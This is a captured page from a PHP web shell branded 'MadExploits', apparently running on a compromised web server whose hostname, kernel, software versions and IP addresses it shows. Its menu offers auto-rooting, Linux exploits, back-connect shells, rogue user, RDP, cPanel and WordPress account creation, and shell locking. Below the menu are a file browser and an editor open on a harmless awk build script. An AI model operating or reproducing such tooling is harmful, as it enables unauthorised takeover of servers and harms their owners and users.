Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
xcache-3.2.0 /
devel /
[ HOME SHELL ]
Name
Size
Permission
Action
graph
[ DIR ]
drwxrwxr-x
gen_const_string_opcodes.awk
1.34
KB
-rwxrwxr-x
gen_xc_opcode_spec.awk
745
B
-rwxrwxr-x
lsnewini
244
B
-rwxrwxr-x
make
33
B
-rwxrwxr-x
po2php.awk
895
B
-rwxrwxr-x
prepare.cfg.example
217
B
-rw-rw-r--
prepare.mak
4.77
KB
-rw-rw-r--
run
7.93
KB
-rwxrwxr-x
sample.cpp.php
11.66
KB
-rw-rw-r--
test.mak
496
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gen_xc_opcode_spec.awk
#! /usr/bin/awk -f # vim:ts=4:sw=4 # process eaccelerator/opcodes.c BEGIN { FS=" " max = 0; started = 0 } /OPDEF/ { if (started) { name = ""; if (match($0, /"([^"]+)"/, m)) { name = m[1]; } sub(/"[^"]*"/, ""); if (!match($0, /EXT_([^ |]+).*OP[1S]_([^ |]+).*OP2_([^ |]+).*RES_([^ |)]+).*/, array)) { print "error" $0 exit } id = ""; if (match($0, /\/\* *([0-9]+) *\*\//, comments)) { id = comments[1]; } printf "\tOPSPEC(%10s, %10s, %10s, %10s) /* %s %-30s */\n", array[1], array[2], array[3], array[4], id, name; next } } /^}/ { print $0 exit; } /^[ ]*,[ ]*$/ { next } { if (started) { print $0 next } } /^static/ { started = 1; print "static const xc_opcode_spec_t xc_opcode_spec[] = {" }
Close